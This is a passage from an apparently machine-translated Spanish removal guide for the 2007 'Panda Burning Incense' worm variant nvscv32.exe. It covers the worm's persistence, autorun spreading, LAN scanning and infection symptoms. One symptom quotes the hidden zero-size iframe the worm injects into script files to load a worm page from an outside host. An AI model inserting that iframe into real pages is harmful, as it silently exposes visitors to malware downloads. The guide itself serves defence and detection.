Panda quema incienso variante nvscv32.exe variante programa de eliminación manual (3)

Tercero, la descripción del virus

Después de ejecutar el archivo que contiene el virión, el virus se copia al directorio del sistema, mientras se modifica el registro. Establezca la entrada de inicio y recorra cada unidad, escriba en el directorio raíz del disco, agregue un archivo Autorun.inf para que el usuario active el virión cuando se abra el disco. Luego, el virión abre un hilo para la infección del archivo local y escanea otras computadoras en la LAN. Al mismo tiempo, otro hilo está conectado a un sitio web para descargar el troyano y lanzar un ataque malicioso.

Nombre del archivo: nvscv32.exe
Nombre del virus: en la actualidad, cada software antivirus no puede detectar y matar (las muestras de virus se han notificado a cada fabricante de virus)
Nombre en chino: (Nimya, Incienso de quema de panda) < BR> Tamaño del virus: 68,570 Bytes
Idioma: Borland Delphi 6.0 - 7.0
Método de empaque: FSG 2.0 -> bart /xt
Tiempo encontrado: 2007.1.16
Nivel de peligro: Alto

Cuarto fenómeno de envenenamiento

1: Hay archivos setup.exe y autorun.inf en el directorio raíz de cada partición del sistema (los discos A y B no están infectados).

2: no puede modificar manualmente las "Opciones de carpeta" para mostrar los archivos ocultos.

3: El archivo oculto de Desktop_ini se puede ver en cada carpeta infectada, el contenido tiene fecha de infección como: 2007-1-16

4: Se agregaron todos los archivos de script en la computadora. El siguiente código: < iframe src = http: //www.krvkr.com/worm.htm width = ”0” height = ”0” > < /iframe >

5: Máquina después del envenenamiento El software antivirus y los cortafuegos comunes no se pueden abrir y ejecutar normalmente.

6: Task Manager, SREng.exe y otras herramientas no se pueden usar normalmente.

7: Paquetes salientes incondicionales, conectados a otras máquinas en la LAN.